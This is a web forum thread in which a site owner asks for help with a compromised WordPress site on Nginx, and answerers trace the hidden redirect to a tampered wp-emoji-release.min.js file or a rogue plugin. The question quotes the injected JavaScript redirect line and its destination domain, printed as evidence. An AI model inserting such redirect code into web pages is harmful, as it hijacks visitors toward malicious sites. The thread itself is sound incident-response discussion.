Question 98679 in Nginx Question posted in
The official documentation can be found here.

WordPress site impacted with redirect injection – Nginx

I have a website that is running on an AWS server using the Bitnami Nginx and WordPress image.

https://www.athleticclubhk.com/

Recently it got all our ads on Google stopped due to malicious content. Oddly this time, its trickier then your standard malware of infected files. When visiting the site incognito, the first and only the first link click gets redirected using the following code:

window.location.replace("https://cartoonmines.com/scount");window.location.href = "https://cartoonmines.com/scount";

This is being injected on any link, however, upon investigating the loaded code on inspect its not injecting it into the page.

I’ve tried to hunt down the theme, plugins, core files and found nothing!

I replaced and reinstalled WordPress core files, deactivated all plugins and even swapped the theme – the problem is still there. I can’t find any hidden .htaccess file in the entire root directory.

I even used GREP to try to look for anything fishy (any clues here that someone can help with?) nothing so far.

The site is still impacted with this so you can easily load the link ~ i do use malwarebytes to keep myself protected, incase you are opening this directly.

Can anyone help?

Tags:

3

Answers


  1. 0
    1. Disable plugins and check again.
    2. Change the database username and password.
    3. Ask the hosting manager to check the host.
    Login or Signup to reply.
  2. 0

    The redirection code is implanted to /wp-includes/js/wp-emoji-release.min.js.

    How to confirm:

    • watch the cookies when clicking internal page, a new cookie is being set for tracking first clicks, named ht_rr
    • save complete webpage locally and try to load it, and check in Chrome dev tools, you’ll see that in Console tab it complains about this Javascript file attempting to set the aforementioned cookie

    While a temporary resolution of deleting the file will fix things for some time…

    There’s no excuse for not setting up a proper server stack. Bitnami or other "great stacks" won’t cut it security-wise. They exist for "fast", but no "quality" setup, and of course, it’s never going to be secure.

    The file got created somehow / had write privileges. This indicates a problem with the setup most of the time. Unless you’re using some nulled plugins or plugins from bad sources.

    Once again, since the website was essentially "pwned", deleting the Javascript file does not mean complete disinfection. To preserve things in a secure state, I would recommend setting things on a clean server environment with strict PHP-FPM permissions aka "lockdown" chmod, and look for write errors to look for infected PHP files.

    Check out some guides on the matter of secure NGINX/PHP-FPM setup:

    Login or Signup to reply.
  3. 0

    Just had the same problem and it was Zend Font Plugin, the same that some people mentioned before.

    Installed Wordfence and this came out. Deleted the plugin and now the site is working perfectly.

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search